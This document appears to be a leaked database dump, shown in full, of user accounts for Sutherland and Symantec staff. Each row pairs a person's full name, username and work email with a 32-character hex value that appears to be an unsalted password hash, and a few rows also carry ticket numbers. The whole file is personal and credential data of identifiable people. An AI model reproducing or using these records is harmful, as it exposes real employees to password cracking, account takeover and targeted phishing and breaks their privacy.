3ac-481c-8c5e-c9e865fef355,<blank>,<blank>,SatyamShwetabh_P2@SUTH.COM,Sutherland
,0e210a7e347f7ee643247d04521745c9,Shwetabh,<blank>,Satyam_Shwetabh_P,Satyam,NULL
,NULL,NULL
e65-410e-9a44-89547d301ccb,<blank>,<blank>,Saud_Mistry@SUTH.COM,Sutherland,b5688
4e5172676c08e22d725972cd050,Liyakat,<blank>,Saud_Liyakat_Mistry,Saud,NULL,NULL,N
ULL
c4b-477c-8b6f-bed0a1139817,<blank>,<blank>,seju_sebastian@suth.com,Sutherland,1a
b8eccb586ec7498ccb763774610866,Sebastian,<blank>,Seju_Sebastian,Seju,NULL,NULL,N
ULL
547c-4b01-839c-9aef94fd600b,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,db7b3cd7cf25050d1235f5ec88cc6e56,R,<blank>,arasananthan_r_cc,Arasananthan
,NULL,NULL,NULL
648-4089-8a4f-40ccf360fb16,<blank>,<blank>,Selvendran_Rajan@SUTH.COM,Sutherland,
0f55674c90fe137d38557d90cab78761,Rajan,<blank>,Selvendran_Rajan,Selvendran,NULL,
NULL,NULL
24a-4785-8ac6-4e7507909172,<blank>,<blank>,Sendil_K@SUTH.COM,Sutherland,892aee89
085209e47e7929078c22dc2f,K,<blank>,Sendil_K,Sendil,NULL,NULL,NULL
f5d-4be9-99f2-81289a4e026b,<blank>,<blank>,Senthel_V@SUTH.COM,Sutherland,f802f78
3ad0c9bc5fd0371091e904df7,V,<blank>,Senthel_V,Senthel,NULL,NULL,NULL
bc9-4394-a239-81722d825f0f,<blank>,<blank>,SenthilKumar_H@SUTH.COM,Sutherland,d7
ceb647a0183aba790e4a488bc1f02f,Kumar,<blank>,Senthil_Kumar_H,Senthil,NULL,NULL,N
ULL
903-4657-a4f4-7bafced115ed,<blank>,<blank>,SenthilKumar_KS2@SUTH.COM,Sutherland,
9f71156c4921f5861bdd06a7465ffceb,Kumar,<blank>,Senthil_Kumar_K_S,Senthil,NULL,NU
LL,NULL
ddb-45bc-ac89-def06c329d3b,<blank>,<blank>,Shailesh_Maurya@SUTH.COM,Sutherland,2
3ae6a32da75a8223784dd8dde3e68fe,J,<blank>,Shailesh_J_Maurya,Shailesh,NULL,NULL,N
ULL
0d9-4277-bc76-2417b61b5e22,<blank>,2633282,tools_id@symantec.suth.com,Sutherland
,eb9e641e6f4ad64048052ab96e4fd65f,Sameer,<blank>,Sayed_Sameer_Zahid_Ali,Sayed,NU
LL,NULL,NULL
c51-457e-8520-058864e53193,<blank>,<blank>,SayjadAbubaker_Waradiawala@SUTH.COM,S
utherland,2f9c8898b84615aa31f6728b15d7336c,Abubaker,<blank>,Sayjad_Abubaker_Wara
diawala,Sayjad,NULL,NULL,NULL
00b-45d9-92b5-c23993dde2d2,<blank>,<blank>,Sebastian_George@SUTH.COM,Sutherland,
e5803b4a42ac0da69090018e80c970e0,Aswin,<blank>,Sebastian_Aswin_George,Sebastian,
NULL,NULL,NULL
b34-4ab9-ae77-5a13bd7aea1b,<blank>,<blank>,Seena_SS@SUTH.COM,Sutherland,df823c1e
b7575478235c869dbde1eab3,S,<blank>,Seena_S_S,Seena,NULL,NULL,NULL
111-4a6a-b71c-4bda61d3b49e,<blank>,<blank>,Shailja_Dalmia@suth.com,Sutherland,d5
c9cc402d50aa5f2948da099cafa5e3,Ashish,<blank>,Shailja_Ashish_Dalmia,Shailja,NULL
,NULL,NULL
8d1-40b6-9809-446388bcb623,<blank>,<blank>,Shajin_Jaleel@SUTH.COM,Sutherland,5a1
ecc6021bc8b31382f772385de8a8f,Jaleel,<blank>,Shajin_Jaleel,Shajin,NULL,NULL,NULL
dc6-4d13-a91d-95d7741d3940,<blank>,<blank>,Shakila_V@SUTH.COM,Sutherland,5c380e0
5fa97351a38c0d3a1495d54ec,Vishnumurthy,<blank>,Shakila_Vishnumurthy,Shakila,NULL
,NULL,NULL
0ab-4662-ad9c-7a124368b809,<blank>,<blank>,Shanker_Madhavarajan@suth.com,Sutherl
and,05d5e1039b150e33be6efe065a034b79,Madhavarajan,<blank>,Shanker_Madhavarajan,S
hanker,NULL,NULL,NULL
a13-46aa-bcfa-01c3c6fa8151,<blank>,<blank>,ShanmukaGayathri_G@SUTH.COM,Sutherlan
d,3cf7901c026d32e72784390282129cd1,Gayathri,<blank>,Shanmuka_Gayathri_G,Shanmuka
,NULL,NULL,NULL
508-4799-b581-0551aba80011,<blank>,<blank>,Sharadha_A@SUTH.COM,Sutherland,fb15af
60e65f9407b2fa294a7c8d086a,A,<blank>,Sharadha_A,Sharadha,NULL,NULL,NULL
dfb-4d9c-857b-383505e0a1e0,<blank>,<blank>,Sharon_Philip@SUTH.COM,Sutherland,4b8
f655d4bced1438e0c8f5715577c7f,Philip,<blank>,Sharon_Philip_P,Sharon,NULL,NULL,NU
LL
449-47be-980b-611de08d3e8b,<blank>,<blank>,Sharon_Patil@SUTH.COM,Sutherland,183e
a776cdb6d064851efa3331c4980a,Renu,<blank>,Sharon_Renu_Patil,Sharon,NULL,NULL,NUL
L
b1f-49fb-946f-e110d1d8e624,<blank>,<blank>,Sharon_Sathyan@SUTH.COM,Sutherland,23
70f99e58e256b681168fec600d1b7a,Sathyan,<blank>,Sharon_Sathyan,Sharon,NULL,NULL,N
ULL
f94-4cf5-8b32-4191a673584b,<blank>,<blank>,ShavasV_Rahman@SUTH.COM,Sutherland,2b
c0a6f6a7ca5645032a2c095c7d7b45,V,<blank>,Shavas_V_Rahman,Shavas,NULL,NULL,NULL
5d5-4025-aa73-4c6e6e48a982,<blank>,<blank>,Sheba_A@suth.com,Sutherland,742546326
5e9940ec5a33d7342fb672c,Vasco,<blank>,Sheba_Vasco_Antao,Sheba,NULL,NULL,NULL
a87-4e7d-9093-d6cc1b7f9dee,<blank>,<blank>,ShebeenJerome_J1@SUTH.COM,Sutherland,
c64aac0faa519670614c4e7bae504103,Jerome,<blank>,Shebeen_Jerome_J,Shebeen,NULL,NU
LL,NULL
514-4770-8195-f56bbcf254da,<blank>,<blank>,SenthilKumar_Ponnusamy@SUTH.COM,Suthe
rland,dfc263738b814351a83746ab7ee258ca,Kumar,<blank>,Senthil_Kumar_Ponnusamy,Sen
thil,NULL,NULL,NULL
31e-4c94-990d-f3fc6aa0ffee,<blank>,<blank>,SenthilKumar_R6@SUTH.COM,Sutherland,7
04e9f88509ccfebddac9ab66910ed4e,Kumar,<blank>,Senthil_Kumar_R,Senthil,NULL,NULL,
NULL
6b2-4512-b922-6b4c7b9e57eb,<blank>,<blank>,Shabana_Moideen@SUTH.COM,Sutherland,6
56f548f343899c2df661258eac3a602,Moideen,<blank>,Shabana_Moideen,Shabana,NULL,NUL
L,NULL
f1d-429c-a8bf-8e2be0521c2a,<blank>,<blank>,Shadab_hashmi@SUTH.COM,Sutherland,320
6535a587321f273c4557acadc9b15,Naaz,<blank>,Shadab_Naaz_hashmi,Shadab,NULL,NULL,N
ULL
a37-4044-8532-99ec584598d1,<blank>,<blank>,Shadil_Dharmadasan@SUTH.COM,Sutherlan
d,65db53752e2cc7975dda60a719ff0423,Dharmadasan,<blank>,Shadil_Dharmadasan,Shadil
,NULL,NULL,NULL
2e0-4a50-a72d-b56c651536e9,<blank>,<blank>,ShaeemuddinAdil_Z@SUTH.COM,Sutherland
,7b8271b761875614f101592723d48e3c,Adil,<blank>,Shaeemuddin_Adil_Z,Shaeemuddin,NU
LL,NULL,NULL
fa8-4578-baf5-d597bee810bb,<blank>,<blank>,Shagufta_Millwala@SUTH.COM,Sutherland
,00f4582f1606e33d70cc806387155f05,Shums,<blank>,Shagufta_Shums_Millwala,Shagufta
,NULL,NULL,NULL
c0a-47ae-831b-16abeb11b8fe,<blank>,<blank>,Shalini_Parab@SUTH.COM,Sutherland,2a8
e75a4b18edb6d8b7561a5247c628b,Abhijeet,<blank>,Shalini_Abhijeet_Parab,Shalini,NU
LL,NULL,NULL
193-40b5-81f9-3060c587a57d,<blank>,<blank>,Shalu_Rejit@SUTH.COM,Sutherland,70636
089637db62af7c866c6dcf35ac3,Rejit,<blank>,Shalu_Rejit,Shalu,NULL,NULL,NULL
a55-4f12-8b3a-4207207f5ebc,<blank>,<blank>,tshama@suth.com,Sutherland,8242bf674e
3ffda89866b2bc345d1d7a,Jaydev,<blank>,Shama_Jaydev_Talreja,Shama,NULL,NULL,NULL
6f2-40d6-8944-c79ea8acf4a5,<blank>,<blank>,Shameem_PA@SUTH.COM,Sutherland,a6b6ef
e43db5e5d0d7cc965f0264fe80,P,<blank>,Shameem_P_A,Shameem,NULL,NULL,NULL
b59-4fce-b4b6-ce336ef6e283,<blank>,<blank>,Shanawaz_Khan@SUTH.COM,Sutherland,afa
d4fd89fc9f86c6d8543ed12f0a6ff,Abdul,<blank>,Shanawaz_Abdul_Samad_Khan,Shanawaz,N
ULL,NULL,NULL
0bb-41c9-9fba-d1f14632b46f,<blank>,<blank>,Sheetal_Dsouza@SUTH.COM,Sutherland,83
cfb3d006333cbbd640dc20e038bdbd,Leona,<blank>,Sheetal_Leona_Dsouza,Sheetal,NULL,N
ULL,NULL
e11-4ddd-9b5d-83eaee8918c7,<blank>,<blank>,Shefin_Khadar@SUTH.COM,Sutherland,b95
093a6b32dae2da480044f1741194b,Khadar,<blank>,Shefin_Khadar,Shefin,NULL,NULL,NULL
0fe-4645-a07a-e430dc64bd70,<blank>,<blank>,SheikDawood_B@SUTH.COM,Sutherland,bd9
3e2f0f0f39943ffec58295f2a4b36,Dawood,<blank>,Sheik_Dawood_B,Sheik,NULL,NULL,NULL
4ca-4152-a1b2-fd87be165379,<blank>,<blank>,Shemy_Patteth@SUTH.COM,Sutherland,49d
46264fb1c2dc155becb94028c6bb7,Patteth,<blank>,Shemy_Patteth,Shemy,NULL,NULL,NULL
1a5-4fab-998c-e050debbd193,<blank>,<blank>,Sherin_S@SUTH.COM,Sutherland,8956b7fc
a58221787508ac4f54d9f8f3,S,<blank>,Sherin_S,Sherin,NULL,NULL,NULL
45c-4c94-a8c4-b399c03858ff,<blank>,<blank>,Shibu_George@SUTH.COM,Sutherland,a362
7ecbeef083017a0e7f4a587fd314,George,<blank>,Shibu_George,Shibu,NULL,NULL,NULL
ea8-4255-a1cf-188b82ab9fd7,<blank>,<blank>,Shijoe_Joseph@SUTH.COM,Sutherland,93a
19e7ae181cf151d86ceea3ef351c9,Joseph,<blank>,Shijoe_Joseph,Shijoe,NULL,NULL,NULL
230-4897-86cb-f7a6d41dfe3f,<blank>,<blank>,Shikha_Ganguly@SUTH.COM,Sutherland,72
de402542f1cc8754bc1896f28d282f,Samar,<blank>,Shikha_Samar_Ganguly,Shikha,NULL,NU
LL,NULL
087-461e-868a-66de29d2c87c,<blank>,2633288,tools_id@symantec.suth.com,Sutherland
,e06dd74a0cfc3ce1f696e2a40a254f51,Dattatray,<blank>,Shilpa_Dattatray_Prabhu,Shil
pa,NULL,NULL,NULL
046-4773-99b5-b5be318304f6,<blank>,<blank>,Shilpa_Sivakumar@SUTH.COM,Sutherland,
470a1f9643a61cfae11c03b8dbd991d9,Sivakumar,<blank>,Shilpa_Sivakumar,Shilpa,NULL,
NULL,NULL
d0c-4f18-955d-3fb0f2ff88c2,<blank>,<blank>,ShineKumar_V@SUTH.COM,Sutherland,e454
5cb1e25495b9523fe93e07715a92,Kumar,<blank>,Shine_Kumar_V,Shine,NULL,NULL,NULL
d94-4c87-8b55-f50cb4fc8974,<blank>,<blank>,Subathra_S@SUTH.COM,Sutherland,ebf3d1
7ef77b6c95cd1ebc876fb2bff0,S,<blank>,Subathra_S,Subathra,NULL,NULL,NULL
595-4b6b-8397-143261c19a7b,<blank>,<blank>,Sudhakar_Y@SUTH.COM,Sutherland,09096a
2833a6260701805e5127e6ce0b,Y,<blank>,Sudhakar_Y,Sudhakar,NULL,NULL,NULL
7ba-4abf-aa21-327fed813188,<blank>,<blank>,Sudhir_Poojari@SUTH.COM,Sutherland,ab
f92948930fef104b8fecc4654df249,Ganapati,<blank>,Sudhir_Ganapati_Poojari,Sudhir,N
ULL,NULL,NULL
beb-45ae-b476-4d0777aa8929,<blank>,<blank>,Suganya_S2@SUTH.COM,Sutherland,a71596
7fb6de895afb7e7b2d02409263,S,<blank>,Suganya_S,Suganya,NULL,NULL,NULL
be1-4fa3-ad5d-f36acbf81e40,<blank>,<blank>,Suhas_TS@SUTH.COM,Sutherland,8eb047d2
45a85ab339bffcecb7ab8bd4,T,<blank>,Suhas_T_S,Suhas,NULL,NULL,NULL
20b-48b8-bb18-e7d366c57e8c,<blank>,<blank>,Sujai_S@SUTH.COM,Sutherland,5f299bd3e
0affc6c70e6d61595f2125e,S,<blank>,Sujai_S,Sujai,NULL,NULL,NULL
d76-4af5-a22b-f942200335ab,<blank>,<blank>,Sujit_Kumar@SUTH.COM,Sutherland,d22ed
1d1bc7497f3895b6731f9281b25,Kumar,<blank>,Sujit_Kumar,Sujit,NULL,NULL,NULL
fc0-4c2c-91e3-220c33410ae2,<blank>,<blank>,Sujithakrishnan_R@SUTH.COM,Sutherland
,b5e844269eb3d02ce6ea86496c5c08f4,R,<blank>,Sujithakrishnan_R,Sujithakrishnan,NU
LL,NULL,NULL
928-4f08-aa18-56c6a82c71f8,<blank>,<blank>,Sukanya_K@SUTH.COM,Sutherland,3f1d86b
18ca31583bf48b5c9ce8a67cb,K,<blank>,Sukanya_K,Sukanya,NULL,NULL,NULL
d8b-4287-8376-1742565176a2,<blank>,<blank>,sukumar_dorairajulu@suth.com,Sutherla
nd,9d13c1552b20aafa34f020f6d4dd6172,Dorairajulu,<blank>,Sukumar_Dorairajulu,Suku
mar,NULL,NULL,NULL
b29-419c-95c1-8513db1e48ac,<blank>,<blank>,SumanSingha_H@SUTH.COM,Sutherland,bf7
87c78a077f996574c9f86356627c4,Singha,<blank>,Suman_Singha_H,Suman,NULL,NULL,NULL
7fa-4904-b6bc-8a4d0f74a8f7,<blank>,<blank>,Sumathi_P@SUTH.COM,Sutherland,cd5a501
6701515ede748ae483ee8b97c,P,<blank>,Sumathi_P,Sumathi,NULL,NULL,NULL
f13-42ae-9392-aab7d17ce234,<blank>,<blank>,Sumesh_Shankar@suth.com,Sutherland,82
7eac8ab951e00d82d27f758bca1ea6,Shankar,<blank>,Sumesh_Shankar,Sumesh,NULL,NULL,N
ULL
1fd-42d6-93c5-ab795bcd4a2a,<blank>,<blank>,Sumesh_Ambekar@SUTH.COM,Sutherland,3b
c74ceee0c7c28c1a7c73ca294369d2,Sudhakar,<blank>,Sumesh_Sudhakar_Ambekar,Sumesh,N
ULL,NULL,NULL
eb7-4ed9-811d-e3170c28cf00,<blank>,<blank>,Sumit_Sinha@SUTH.COM,Sutherland,2adc4
05afb3526bb87f528b5773cd774,Sinha,<blank>,Sumit_Sinha,Sumit,NULL,NULL,NULL
7b1-4f36-b436-21143d9c7e3e,<blank>,<blank>,SumithaS_Pillai@SUTH.COM,Sutherland,9
8424c55dd577f7395949ba69daf85fb,S,<blank>,Sumitha_S_Pillai,Sumitha,NULL,NULL,NUL
L
179-4d55-8040-8ce2d63f61d8,<blank>,<blank>,Sunayana_Menon@SUTH.COM,Sutherland,ee
ee3663ee1b00321fb8f7a8f32943cf,Menon,<blank>,Sunayana_Menon,Sunayana,NULL,NULL,N
ULL
0d8-4823-b301-fc11b9cf6fef,<blank>,<blank>,Sundari_P@SUTH.COM,Sutherland,d40b669
6374248e48fa581467e479f92,P,<blank>,Sundari_P,Sundari,NULL,NULL,NULL
b27-46ee-8898-59f7ddbc63ca,<blank>,<blank>,Sunil_Chaudhary@SUTH.COM,Sutherland,4
440e7032aac19ba6018a7a10263b322,Chaudhary,<blank>,Sunil_Chaudhary,Sunil,NULL,NUL
L,NULL
2fd-4205-9c8f-7807e91fff24,<blank>,<blank>,Shinto_Kuriappan@SUTH.COM,Sutherland,
6b2190b16d626b342b37a0a5d3a36723,Kattil,<blank>,Shinto_Kattil_Kuriappan,Shinto,N
ULL,NULL,NULL
9f1-4e3b-9244-0f7693850886,<blank>,<blank>,Shital_Edwankar@SUTH.COM,Sutherland,8
8ed89e611739a2de8702338ecc24334,Vikas,<blank>,Shital_Vikas_Edwankar,Shital,NULL,
NULL,NULL
406-49cb-b948-d1419d13f7ba,<blank>,<blank>,Shiv_Dubey@SUTH.COM,Sutherland,06f310
79d4b51f7339360014273fb8da,Kumar,<blank>,Shiv_Kumar_Dubey,Shiv,NULL,NULL,NULL
123-4ac3-9414-45a7b43028bc,<blank>,<blank>,ShivaKumar_Padmanabhan@suth.com,Suthe
rland,b2a1812333061e144ec7081f0208d8a6,Kumar,<blank>,Shiva_Kumar_Padmanabhan,Shi
va,NULL,NULL,NULL
5ae-4908-bc41-5a1c8bcfbf4d,<blank>,<blank>,ShivaKumar_V1@SUTH.COM,Sutherland,066
cf728caf54286a0c10340c8adf5fd,Kumar,<blank>,Shiva_Kumar_V,Shiva,NULL,NULL,NULL
84a-482d-904d-663515f8c6e1,<blank>,<blank>,ShivangiSuryakant_Sawant@SUTH.COM,Sut
herland,a15a42b4ac642b88681de148809a7c1e,Suryakant,<blank>,Shivangi_Suryakant_Sa
want,Shivangi,NULL,NULL,NULL
81c-4215-85eb-d3a7933c4f71,<blank>,<blank>,Shiyaz_Shibily@SUTH.COM,Sutherland,e1
fcc7b6690c8f31fd76f858e4f4bf23,K,<blank>,Shiyaz_K_Shibily,Shiyaz,NULL,NULL,NULL
c27-4e6b-8245-c2e6982cb683,<blank>,<blank>,Shiynu_Mathew@SUTH.COM,Sutherland,36d
6ad262dc90403af4b63688ad92fd8,Mathew,<blank>,Shiynu_Mathew_M,Shiynu,NULL,NULL,NU
LL
458-48af-b750-a4ce49805ade,<blank>,<blank>,ShomenathAdhikari_M@SUTH.COM,Sutherla
nd,f9a6bceb43a9ecf42402a5584e4ed6e5,Adhikari,<blank>,Shomenath_Adhikari_M,Shomen
ath,NULL,NULL,NULL
2da-499b-828b-d51f5d0e3d92,<blank>,<blank>,ShorubaRani_E@SUTH.COM,Sutherland,7c7
21fb1cee5022701ce67551e2667e0,Rani,<blank>,Shoruba_Rani_E,Shoruba,NULL,NULL,NULL
59e-4f04-b4b7-c0022d8b2d24,<blank>,<blank>,Shreram_S@SUTH.COM,Sutherland,aeb62cd
2458cba5c9faba29c84e9afba,S,<blank>,Shreram_S,Shreram,NULL,NULL,NULL
942-4dc4-b074-abe8d07ca527,<blank>,<blank>,ShriSakthi_V@SUTH.COM,Sutherland,f83d
8a5d70a8a99da14429e09968061b,Sakthi,<blank>,Shri_Sakthi_V,Shri,NULL,NULL,NULL
b06-42fd-aa24-235edb7978f8,<blank>,<blank>,Shrikant_Masurkar@SUTH.COM,Sutherland
,9424b04727fd1cfc51532d50e69badc7,Shashikant,<blank>,Shrikant_Shashikant_Masurka
r,Shrikant,NULL,NULL,NULL
b99-49cc-8660-df87ee762646,<blank>,<blank>,Gopalakrishnan_Shriram@suth.com,Suthe
rland,d7b08f61c41bc366256ee1f3ce994172,Gopalakrishnan,<blank>,Shriram_Gopalakris
hnan,Shriram,NULL,NULL,NULL
186-4bbf-a340-4f318bdf0318,<blank>,<blank>,Shruthi_Varghese@SUTH.COM,Sutherland,
9d3cad502fa45b5ca725dbab1bbb0123,Niju,<blank>,Shruthi_Niju_Varghese,Shruthi,NULL
,NULL,NULL
dfe-49d0-bd81-625b43dd739c,<blank>,<blank>,Shwetha_Salian@SUTH.COM,Sutherland,0d
1066b459951958f23ff41856f53735,Sadashiv,<blank>,Shwetha_Sadashiv_Salian,Shwetha,
NULL,NULL,NULL
92b-4820-845e-a18c7a0c6434,<blank>,<blank>,Tools_id@symantec.suth.com,Sutherland
,5407c3f2463e1038f31390e62f124cb6,B,<blank>,Srinivasan_B,Srinivasan,NULL,NULL,NU
LL
dba-4508-8e34-2156beb6baf6,<blank>,<blank>,Srinivasan_G2@SUTH.COM,Sutherland,5cd
7b58e34248d94eb24f26a55f8ef4a,G,<blank>,Srinivasan_G,Srinivasan,NULL,NULL,NULL
6d1-46a1-80af-af9a09ca3770,<blank>,<blank>,Siddesh_Shirke@SUTH.COM,Sutherland,54
ec337c9ca10d52a56b1aa50451a05b,Gajanan,<blank>,Siddesh_Gajanan_Shirke,Siddesh,NU
LL,NULL,NULL
095-4877-8eb2-bfd6c07c7889,<blank>,<blank>,Siddharth_Issar@SUTH.COM,Sutherland,7
659b843867c3f455a3fdeaea3a71edc,Umesh,<blank>,Siddharth_Umesh_Issar,Siddharth,NU
LL,NULL,NULL
844-4326-9e67-c1f80f9cb1d2,<blank>,<blank>,Siddhesh_Sharma@SUTH.COM,Sutherland,5
beb1f15990ff34e29689db843af2844,Dwijendra,<blank>,Siddhesh_Dwijendra_Sharma,Sidd
hesh,NULL,NULL,NULL
345-4077-8338-a6b992141169,<blank>,<blank>,Siddhesh_Naik@SUTH.COM,Sutherland,d31
d6e0e223b0683008a2ec0daad98af,Subhash,<blank>,Siddhesh_Subhash_Naik,Siddhesh,NUL
L,NULL,NULL
fc8-44f1-a2f7-b2063cc55e1e,<blank>,<blank>,Simi_Mathew@SUTH.COM,Sutherland,caa0c
19aa5bd664e5f67dbef29dc84e0,Elizabeth,<blank>,Simi_Elizabeth_Mathew,Simi,NULL,NU
LL,NULL
f4b-4146-8c32-254651cc59b3,<blank>,<blank>,Sirisha_YRLP@SUTH.COM,Sutherland,7be8
ce26781c0b0d3958b3323810824c,Y,<blank>,Sirisha_Y_R_L_P,Sirisha,NULL,NULL,NULL
2bf-4c91-9b60-081c70e4d347,<blank>,<blank>,Sisir_PS@SUTH.COM,Sutherland,ba5557ec
93500b023200f0e594f673e6,P,<blank>,Sisir_P_S,Sisir,NULL,NULL,NULL
f90-43cf-84ee-cf63fd955310,<blank>,<blank>,Sita_Tripathy@SUTH.COM,Sutherland,123
5060d7f30a630081fc33e6f500cbd,Prasad,<blank>,Sita_Prasad_Tripathy,Sita,NULL,NULL
,NULL
474-4692-8154-8a1fdc589b1b,<blank>,<blank>,Sivagami_Palaniappan@suth.com,Sutherl
and,1b2b3d146d6813831172db6fa856d236,Palaniappan,<blank>,Sivagami_Palaniappan,Si
vagami,NULL,NULL,NULL
ac5-4557-9d57-fee4e86f884b,<blank>,<blank>,Sivakumar_A1@SUTH.COM,Sutherland,6b10
227d1a1804e2400cbf63ca4d678d,A,<blank>,Sivakumar_A,Sivakumar,NULL,NULL,NULL
9b8-4c7a-8add-9e4c8e03416d,<blank>,<blank>,Shivanandam_VP@suth.com,Sutherland,40
94dceeb453f014c8fd439854dd8707,Viswanathan,<blank>,Sivanandan_Viswanathan,Sivana
ndan,NULL,NULL,NULL
1ed-4e37-8b3f-e8603c093b38,<blank>,074509,Tools_id@symantec.suth.com,Sutherland,
571fa1e126e55e1cf75e31f48de4c302,G,<blank>,Sivaraj_G,Sivaraj,NULL,NULL,NULL
dfb-4558-b4ac-2b2c65c26b94,<blank>,<blank>,Smita_Desai@SUTH.COM,Sutherland,45433
4ab3fdb298818dad62c3ab0545b,Vinay,<blank>,Smita_Vinay_Desai,Smita,NULL,NULL,NULL
d8f-4459-84e5-970bd3bbf4b5,<blank>,<blank>,Smitha_C@SUTH.COM,Sutherland,70a113a9
2c9a24ea7f0df46e5a28ad12,C,<blank>,Smitha_C,Smitha,NULL,NULL,NULL
b53-43a4-91dc-3859aea860a2,<blank>,<blank>,SmithaSukumaran_P@SUTH.COM,Sutherland
,b77a002b63170b789709ea1910054920,Sukumaran,<blank>,Smitha_Sukumaran_P,Smitha,NU
LL,NULL,NULL
5ce-4e0b-b42d-94e45aa296ce,<blank>,<blank>,Sohail_Khan@SUTH.COM,Sutherland,a3f2c
6498d593138b351d121e7c97c2b,Sayed,<blank>,Sohail_Sayed_Khan,Sohail,NULL,NULL,NUL
L
75b-40b4-8569-0e7137f536c2,<blank>,<blank>,Sonia_Alexander@SUTH.COM,Sutherland,9
f394d2f4f9907a6ba05eb9891fac54f,Alexander,<blank>,Sonia_Alexander,Sonia,NULL,NUL
L,NULL
c21-43e5-8880-612b2e5c0790,<blank>,<blank>,Sony_I@SUTH.COM,Sutherland,e9cfab5a40
21c36b242d87aaef3dd304,Bright,<blank>,Sony_Bright_I,Sony,NULL,NULL,NULL
b3f-44ac-bf70-0ab6ee662494,<blank>,<blank>,Sony_Jacob@SUTH.COM,Sutherland,bb4c9e
7d97d8c71948fae842ae472d0a,Jacob,<blank>,Sony_Jacob,Sony,NULL,NULL,NULL
272-4036-b10b-887715ad4161,<blank>,<blank>,Sony_Sojan@SUTH.COM,Sutherland,d6cbd8
0d37562220658c4a505ea6a38c,Sojan,<blank>,Sony_Sojan,Sony,NULL,NULL,NULL
ebb-43c8-a4af-091ca29df903,<blank>,<blank>,Soubir_Das@SUTH.COM,Sutherland,2013cc
63a89e83077eb43b0ad36ef595,Prabhat,<blank>,Soubir_Prabhat_Das,Soubir,NULL,NULL,N
ULL
f86-405e-97da-837aea1578a2,<blank>,<blank>,Soumya_Jose@SUTH.COM,Sutherland,a518b
e1a2bf48ab3fda7e57da642c5bc,Jose,<blank>,Soumya_Jose,Soumya,NULL,NULL,NULL
15a-4dbc-9728-1886704828f9,<blank>,<blank>,SowmyaSree_Prabhakaran@SUTH.COM,Suthe
rland,53682f42bc51307656d0afb4adb4204e,Sree,<blank>,Sowmya_Sree_Prabhakaran,Sowm
ya,NULL,NULL,NULL
fd0-4793-b7df-23863d5a5513,<blank>,<blank>,SreePrabhuB_B@Suth.com,Sutherland,c37
ec0b6e495207561159d81ca7df34a,Prabhu,<blank>,Sree_Prabhu_Balasubramanian,Sree,NU
LL,NULL,NULL
50a-4831-abba-fcaa46f902da,<blank>,<blank>,Sreeja_MS@SUTH.COM,Sutherland,f451434
49c291f5fb3499b6f0084706b,M,<blank>,Sreeja_M_S,Sreeja,NULL,NULL,NULL
540-463e-9e7f-efb5c201da89,<blank>,<blank>,Sreejith_KS@SUTH.COM,Sutherland,5fb15
fe0fca62388fd21fd54d25497ce,K,<blank>,Sreejith_K_S,Sreejith,NULL,NULL,NULL
e92-44c4-9f90-2f7f258c98c5,<blank>,<blank>,Sreejith_Krishnan@SUTH.COM,Sutherland
,3cc4cc7616d7f7971e07da0e4781f4c1,Vazhoor,<blank>,Sreejith_Vazhoor_Krishnan,Sree
jith,NULL,NULL,NULL
005-4470-b3e1-717d86ade8a0,<blank>,<blank>,Sreekanth_Radhakrishnan@SUTH.COM,Suth
erland,e9a62da6c3ca5373352c550acb95e4ba,Radhakrishnan,<blank>,Sreekanth_Radhakri
shnan,Sreekanth,NULL,NULL,NULL
251-44f4-8093-3647b6255df3,<blank>,<blank>,Sreenath_T@SUTH.COM,Sutherland,020074
8dd2bb4db465ef06865d0339d1,T,<blank>,Sreenath_T,Sreenath,NULL,NULL,NULL
a01-40af-9618-e60c8ffe50e2,<blank>,<blank>,Sreenesh_NV@SUTH.COM,Sutherland,963d9
44997b2f753fc3623a9d438ff44,N,<blank>,Sreenesh_N_V,Sreenesh,NULL,NULL,NULL
cd1-44eb-baee-4e9e6cdec279,<blank>,<blank>,Srichand_A@SUTH.COM,Sutherland,8e41ec
b976f2eb18679adb62b44cc7ee,A,<blank>,Srichand_A,Srichand,NULL,NULL,NULL
a10-4df1-8332-183acfd5c7f5,<blank>,<blank>,Tools_id@symantec.suth.com,Sutherland
,0a3af1a1b7b25194068374aafe156a5d,Gopala,<blank>,Sridevi_Gopala_Krishnan,Sridevi
,NULL,NULL,NULL
1a7-4455-9213-2ac9b6b17a47,<blank>,<blank>,Sridhar_Kollaram@suth.com,Sutherland,
03195521f8157396a77e42602a7eb568,Kollaram,<blank>,Sridhar_Kollaram,Sridhar,NULL,
NULL,NULL
932-464f-a312-182bcdadb723,<blank>,<blank>,jeori_vanbeek@symantec.com,Symantec,3
472cc186aea6f59851f429419b2132b,Van Beek,<blank>,Joeri_Van Beek,Joeri,NULL,NULL,
NULL
cee8-4cd6-8eb1-3d4bc4e66c2c,WS 27-08-2010,INC000000251655,tools_id@symantec.suth
.com,<blank>,91508da712faa1073041a6fa4c387ede,K,<blank>,092578,Ajeesh,NULL,NULL,
NULL
b4f-40b1-83ca-afbf23dc8ede,<blank>,<blank>,celia_robillard@symantec.com,Symantec
,6d2157e81d64205bee010b983e82b3d5,Robillard,<blank>,Celia_Robillard,Celia,NULL,N
ULL,NULL
afa-4371-9abe-c46f5e62e7e9,<blank>,<blank>,janne_juntunen@symantec.com,Symantec,
bc2fb60b1b23105d26430db0b00aab9c,Juntunen,<blank>,Janne_Juntunen,Janne,NULL,NULL
,NULL
2d5-4feb-9aac-c03a5b2a3a2a,<blank>,<blank>,delphine_maingueneau@symantec.com,Sym
antec,8d784f2cd9fc3672af4521e46754b6fb,Maingueneau,<blank>,Delphine_Maingueneau,
Delphine,NULL,NULL,NULL
a67f-4cb7-a6b8-c8e06068bd21,"CRQ000000682615 CLNP June 04,2012",999-999-9999,too
ls_id@symantec.suth.com,Sutherland,ee6f357c751110197128b9c7492699cc,Yakub,<blank
>,226249,Jalaluddin,NULL,NULL,NULL
e32-48d1-8f52-b191f61cb660,<blank>,<blank>,desiree_ballin@symantec.com,Symantec,
e76cc4b6b3aceae72d047522c64eee6b,Ballin,<blank>,Desiree_Ballin,Desiree,NULL,NULL
,NULL
266-433e-a37d-fe0da104cad4,<blank>,<blank>,Nele_Belmans@symantec.com,Symantec,86
98f646fbb0898c62558c7e9db04df1,Belmans,<blank>,Nele_Belmans,Nele,NULL,NULL,NULL
ec5-4067-a8c7-61727d8924af,<blank>,<blank>,Alina_Amir-Qureshi@symantec.com,Syman
tec,21aab09bba186dedaca44666117d5279,Amir-Qureshi,<blank>,Alina_Amir_Qureshi,Ali
na,NULL,NULL,NULL
